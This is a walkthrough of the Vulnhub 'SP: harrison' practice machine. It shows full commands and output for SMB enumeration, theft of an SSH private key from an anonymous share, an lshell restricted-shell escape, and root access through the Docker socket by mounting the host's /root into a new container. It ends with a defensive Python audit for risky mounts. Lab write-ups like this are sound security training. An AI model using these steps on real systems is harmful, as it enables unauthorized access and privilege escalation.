Vulnhub Harrison machine: detailed walkthrough (privilege escalation successful)


Harrison

Author: jason huawen
Machine information

Name: SP: harrison
Address: https://www.vulnhub.com/entry/sp-harrison,302/
Identifying the target host's IP address
┌──(kali㉿kali)-[~/Vulnhub/Harrison]
└─$ sudo netdiscover -i eth1 -r 192.168.56.0/24
Currently scanning: Finished!   |   Screen View: Unique Hosts

3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180
_____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.1    0a:00:27:00:00:05      1      60  Unknown vendor
192.168.56.100  08:00:27:19:b1:e6      1      60  PCS Systemtechnik GmbH
192.168.56.125  08:00:27:a8:46:b3      1      60  PCS Systemtechnik GmbH

Using Kali Linux's netdiscover tool, the target host's IP address is identified as 192.168.56.125.
Nmap scan
┌──(kali㉿kali)-[~/Vulnhub/Harrison]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.125 -oN nmap_full_scan
Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-22 19:19 EDT
Nmap scan report for bogon (192.168.56.125)
Host is up (0.000094s latency).
Not shown: 65533 closed tcp ports (reset)
PORT    STATE SERVICE     VERSION
22/tcp  open  ssh         OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 5b87f1fe678fa6ba8b753c11343db6b8 (RSA)
|   256 93877e2e5e4ece7156a11c6bfc1f6e55 (ECDSA)
|_  256 c014c024e8a87ed4cda64225f3484794 (ED25519)
445/tcp open  netbios-ssn Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP)
MAC Address: 08:00:27:A8:46:B3 (Oracle VirtualBox virtual NIC)
Service Info: Host: HARRISON; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
| smb2-time:
|   date: 2023-04-23T07:19:44
|_  start_date: N/A
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode:
|   311:
|_    Message signing enabled but not required
| smb-os-discovery:
|   OS: Windows 6.1 (Samba 4.7.6-Ubuntu)
|   Computer name: harrison
|   NetBIOS computer name: HARRISON\x00
|   Domain name: \x00
|   FQDN: harrison
|_  System time: 2023-04-23T07:19:45+00:00
|_clock-skew: mean: 8h00m00s, deviation: 0s, median: 7h59m59s
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.48 seconds

The Nmap scan shows that the target host has two open ports: 22 (SSH) and 445 (Samba).
Getting a shell
┌──(kali㉿kali)-[~/Vulnhub/Harrison]
└─$ smbclient -L 192.168.56.125
Password for [WORKGROUP\kali]:
Anonymous login successful
        Sharename       Type      Comment
        ---------       ----      -------
        Private         Disk
        IPC$            IPC       IPC Service (Samba 4.7.6-Ubuntu)
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 192.168.56.125 failed (Error NT_STATUS_CONNECTION_REFUSED)
Unable to connect with SMB1 -- no workgroup available

┌──(kali㉿kali)-[~/Vulnhub/Harrison]
└─$ smbclient //192.168.56.125/Private
Password for [WORKGROUP\kali]:
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Thu Apr 18 12:55:51 2019
  ..                                  D        0  Thu Apr 18 12:12:55 2019
  .bash_logout                        H      220  Wed Apr  4 14:30:26 2018
  .profile                            H      807  Wed Apr  4 14:30:26 2018
  .bashrc                             H     3771  Wed Apr  4 14:30:26 2018
  silly_cats                          D        0  Thu Apr 18 12:55:51 2019
  .ssh                               DH        0  Thu Apr 18 12:42:57 2019
  flag.txt                            N       32  Thu Apr 18 12:14:18 2019
                32894736 blocks of size 1024. 27322884 blocks available
smb: \> get flag.txt
getting file \flag.txt of size 32 as flag.txt (15.6 KiloBytes/sec) (average 15.6 KiloBytes/sec)
smb: \> cd .ssh
smb: \.ssh\> ls
  .                                   D        0  Thu Apr 18 12:42:57 2019
  ..                                  D        0  Thu Apr 18 12:55:51 2019
  authorized_keys                     N      399  Thu Apr 18 12:42:57 2019
  id_rsa                              A     1679  Thu Apr 18 12:14:17 2019
  id_rsa.pub                          A      399  Thu Apr 18 12:14:17 2019
                32894736 blocks of size 1024. 27322884 blocks available
smb: \.ssh\> get id_rsa
getting file \.ssh\id_rsa of size 1679 as id_rsa (546.5 KiloBytes/sec) (average 334.2 KiloBytes/sec)
smb: \.ssh\> get id_rsa.pub
getting file \.ssh\id_rsa.pub of size 399 as id_rsa.pub (194.8 KiloBytes/sec) (average 294.4 KiloBytes/sec)
smb: \.ssh\> get authorized_keys
getting file \.ssh\authorized_keys of size 399 as authorized_keys (129.9 KiloBytes/sec) (average 245.0 KiloBytes/sec)
smb: \.ssh\> cd ..
smb: \> cd silly_cats\
smb: \silly_cats\> ls
  .                                   D        0  Thu Apr 18 12:55:51 2019
  ..                                  D        0  Thu Apr 18 12:55:51 2019
  cat3.jpg                            N    38624  Mon Jan  8 13:30:10 2018
  cat1.jpg                            N    73946  Mon Jan  8 13:29:40 2018
  cat2.jpg                            N    74130  Mon Jan  8 13:29:32 2018
                32894736 blocks of size 1024. 27322884 blocks available
smb: \silly_cats\> get cat1.jpg
getting file \silly_cats\cat1.jpg of size 73946 as cat1.jpg (24070.2 KiloBytes/sec) (average 5743.3 KiloBytes/sec)
smb: \silly_cats\> get cat2.jpg
getting file \silly_cats\cat2.jpg of size 74130 as cat2.jpg (24130.1 KiloBytes/sec) (average 9191.0 KiloBytes/sec)
smb: \silly_cats\> get cat3.jpg
getting file \silly_cats\cat3.jpg of size 38624 as cat3.jpg (18858.5 KiloBytes/sec) (average 10265.2 KiloBytes/sec)
smb: \silly_cats\> quit
┌──(kali㉿kali)-[~/Vulnhub/Harrison]
└─$ enum4linux 192.168.56.125
[+] Enumerating users using SID S-1-22-1 and logon username '', password ''

S-1-22-1-1000 Unix User\harrison (Local User)

enum4linux identifies the user name harrison.
┌──(kali㉿kali)-[~/Vulnhub/Harrison]
└─$ cat flag.txt
It's not going to be that easy.

Not that easy?
┌──(kali㉿kali)-[~/Vulnhub/Harrison]
└─$ chmod 400 id_rsa

┌──(kali㉿kali)-[~/Vulnhub/Harrison]
└─$ ssh -i id_rsa harrison@192.168.56.125
The authenticity of host '192.168.56.125 (192.168.56.125)' can't be established.
ED25519 key fingerprint is SHA256:O+XKyphfQuB/KW9A8/6nUKPZTAGMJNtRBH8CrijPGnY.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.56.125' (ED25519) to the list of known hosts.
Welcome to Harrison. Enjoy your shell.
Type '?' or 'help' to get the list of allowed commands
harrison:~$ id
*** forbidden command: id
harrison:~$

We have a shell, but it is a restricted shell.
┌──(kali㉿kali)-[~/Vulnhub/Harrison]
└─$ ssh -i id_rsa harrison@192.168.56.125 -t /bin/sh
*** forbidden shell escape: "/bin/sh"
This incident has been reported.
Connection to 192.168.56.125 closed.

Specifying a different shell with the -t option does not escape the restricted shell.
harrison:~$ echo $SHELL
*** forbidden path: /usr/bin/lshell

This shows the restricted shell is lshell.
harrison:~$ echo && "bash"
harrison@harrison:~$ ls -alh
total 44K
drwxr-xr-x 1 harrison harrison 4.0K Apr 23 07:31 .
drwxr-xr-x 1 root     root     4.0K Apr 18  2019 ..
-rw-r--r-- 1 harrison harrison  220 Apr  4  2018 .bash_logout
-rw-r--r-- 1 harrison harrison 3.7K Apr  4  2018 .bashrc
drwx------ 2 harrison harrison 4.0K Apr 23 07:24 .cache
-rw------- 1 harrison harrison  272 Apr 23 07:31 .lhistory
-rw-r--r-- 1 harrison harrison  807 Apr  4  2018 .profile
drwxr-xr-x 1 harrison harrison 4.0K Apr 18  2019 .ssh
-rw-r--r-- 1 root     root       32 Apr 18  2019 flag.txt
drwxr-xr-x 2 root     root     4.0K Apr 18  2019 silly_cats
harrison@harrison:~$ cd /home
harrison@harrison:/home$ ls
harrison
harrison@harrison:/home$

Escaping with echo && "bash" gives a normal, unrestricted shell.
harrison@harrison:/root$ ls -alh
total 20K
drwxr-xr-x 1 root root 4.0K Apr 18  2019 .
drwxr-xr-x 1 root root 4.0K Apr 23 07:16 ..
-rw-r--r-- 1 root root 3.1K Apr  9  2018 .bashrc
-rw-r--r-- 1 root root  148 Aug 17  2015 .profile
-rwxr--r-- 1 root root   49 Apr 18  2019 flag.txt
harrison@harrison:/root$ cat flag.txt
Nope. No flags here. Where do you think you are?
Privilege escalation

Privilege escalation is achieved through Docker, but the process is quite involved; it could only be completed by following other people's write-ups.
List the existing containers
harrison@harrison:~$ cd /tmp
harrison@harrison:/tmp$ curl -XGET --unix-socket /var/run/docker.sock http://localhost/containers/json
[{"Id":"902f9eaf084a2da13ce02a097e80c39686c73c6af1ffcc78602c83dde49ae534","Names":["/nervous_proskuriakova"],"Image":"cont1:v1","ImageID":"sha256:6275c2bd4f72c6c417458fa6caecf2bc23bf823298650334c3c3bd42579aa95f","Command":"/bin/sh -c '/etc/init.d/smbd start && /etc/init.d/ssh start && bash' /bin/bash","Created":1682237761,"Ports":[{"IP":"0.0.0.0","PrivatePort":22,"PublicPort":22,"Type":"tcp"},{"IP":"0.0.0.0","PrivatePort":445,"PublicPort":445,"Type":"tcp"}],"Labels":{},"State":"running","Status":"Up 56 seconds","HostConfig":{"NetworkMode":"default"},"NetworkSettings":{"Networks":{"bridge":{"IPAMConfig":null,"Links":null,"Aliases":null,"NetworkID":"a81871ff28475882e034ea03bb1aab0b2ba4d0d1271312250f1db62337acc2b0","EndpointID":"01e3e3658c213f253bd4d957175f1007e23e6e4c2d9268e14d80a36512d531fb","Gateway":"172.17.0.1","IPAddress":"172.17.0.2","IPPrefixLen":16,"IPv6Gateway":"","GlobalIPv6Address":"","GlobalIPv6PrefixLen":0,"MacAddress":"02:42:ac:11:00:02","DriverOpts":null}}},"Mounts":[{"Type":"bind","Source":"/var/run/docker.sock","Destination":"/var/run/docker.sock","Mode":"","RW":true,"Propagation":"rprivate"}]}]
Write the definition of the new container (it bind-mounts the host's /root/ into the container as /os_root):
harrison@harrison:/tmp$ echo -e '{"Image":"ubuntu","Cmd":["/bin/sh"],"DetachKeys":"Ctrl-p,Ctrl-q","OpenStdin":true,"Mounts":[{"Type":"bind","Source":"/root/","Target":"/os_root"}]}' > container.json
Create the new container; the response returns its Id:
harrison@harrison:/tmp$ curl -XPOST -H "Content-Type: application/json" --unix-socket /var/run/docker.sock -d "$(cat container.json)" http://localhost/containers/create
{"Id":"ea0a8e5839ab3e2817b02fb086a63a776f06afcd5a4f742eb5d8a898aae3719f","Warnings":null}
Start the new container:
harrison@harrison:/tmp$ curl -XPOST --unix-socket /var/run/docker.sock http://localhost/containers/ea0a/start
Attach to the newly created container:
harrison@harrison:/tmp$ nc -U /var/run/docker.sock
POST /containers/34b3/attach?stream=1&stdin=1&stdout=1&stderr=1 HTTP/1.1
Host:
Connection: Upgrade
Upgrade: tcp
HTTP/1.1 404 Not Found
Content-Type: application/vnd.docker.raw-stream
No such container: 34b3
harrison@harrison:/tmp$ nc -U /var/run/docker.sock
POST /containers/ea0a/attach?stream=1&stdin=1&stdout=1&stderr=1 HTTP/1.1
Host:
Connection: Upgrade
Upgrade: tcp
HTTP/1.1 101 UPGRADED
Content-Type: application/vnd.docker.raw-stream
Connection: Upgrade
Upgrade: tcp
ls
bin
boot
dev
etc
home
lib
lib64
media
mnt
opt
os_root
proc
root
run
sbin
srv
sys
tmp
usr
var
cd os_root
ls -alh
total 32K
drwx------ 3 root root 4.0K Apr 18  2019 .
drwxr-xr-x 1 root root 4.0K Apr 23 08:18 ..
-rw------- 1 root root  289 Apr 18  2019 .bash_history
-rw-r--r-- 1 root root 3.1K Apr  9  2018 .bashrc
drwxr-xr-x 3 root root 4.0K Apr 16  2019 .local
-rw-r--r-- 1 root root  148 Aug 17  2015 .profile
-rw-r--r-- 1 root root   66 Apr 18  2019 .selected_editor
-rwx------ 1 root root   73 Apr 18  2019 flag.txt
cat flag.txt
Do you think you are out?
Just kidding, here is your flag: 1xcDF933mce

Note that every command here must refer to the same container ID, the Id returned by the create call (ea0a...); the first attach attempt above used a wrong ID, 34b3, and was answered with 404 No such container.
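As an added, defender-side example (not part of the original walkthrough): a small Python audit over the Docker Engine API mount objects shown above, flagging the two things that made this escalation possible, the Docker socket bind-mounted into the running container and a host directory (/root/) bind-mounted into a new one. The sample JSON is constructed from the fields in the page's output; the function names are my own, and a real deployment would feed it the live /containers/json listing or run it as a policy check on /containers/create bodies.

```python
import json

# Constructed samples: the fields the check needs, copied from the walkthrough's
# /containers/json listing and its container.json body (not the full output).
RUNNING_CONTAINERS = json.loads('''[{"Id": "902f9eaf084a2da13ce02a097e80c39686c73c6af1ffcc78602c83dde49ae534",
  "Names": ["/nervous_proskuriakova"], "Image": "cont1:v1",
  "Mounts": [{"Type": "bind", "Source": "/var/run/docker.sock",
              "Destination": "/var/run/docker.sock", "RW": true}]}]''')
CREATE_REQUEST = json.loads('''{"Image": "ubuntu", "Cmd": ["/bin/sh"], "OpenStdin": true,
  "Mounts": [{"Type": "bind", "Source": "/root/", "Target": "/os_root"}]}''')

DOCKER_SOCKET = "/var/run/docker.sock"
# Host directories whose bind mount hands a container host secrets or persistence.
SENSITIVE_DIRS = ("/root", "/etc", "/home", "/proc", "/sys", "/var/run")

def _norm(path):
    """Strip a trailing slash ("/root/" -> "/root") but keep "/" itself."""
    return path.rstrip("/") or "/"

def risky_mounts(mounts):
    """Return (source, target, reason) for each bind mount that exposes the host.
    Handles inspect output (Destination/RW) and create requests (Target/ReadOnly)."""
    findings = []
    for m in mounts:
        if m.get("Type") != "bind":
            continue
        src = _norm(m.get("Source", ""))
        dst = m.get("Destination") or m.get("Target", "")
        mode = "read-write" if m.get("RW", not m.get("ReadOnly", False)) else "read-only"
        if src == DOCKER_SOCKET:
            findings.append((src, dst, "docker socket inside container: full control of the host daemon"))
        elif src == "/":
            findings.append((src, dst, "entire host filesystem bind-mounted " + mode))
        elif any(src == d or src.startswith(d + "/") for d in SENSITIVE_DIRS):
            findings.append((src, dst, "sensitive host path bind-mounted " + mode))
    return findings

def audit(containers):
    """Map each container name to its risky mounts (empty list: nothing found)."""
    return {c["Names"][0]: risky_mounts(c.get("Mounts", [])) for c in containers}

def should_block_create(request):
    """True if a /containers/create body should be refused by a policy hook."""
    return bool(risky_mounts(request.get("Mounts", [])))

if __name__ == "__main__":
    print(audit(RUNNING_CONTAINERS))
    print("block container.json request:", should_block_create(CREATE_REQUEST))
```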
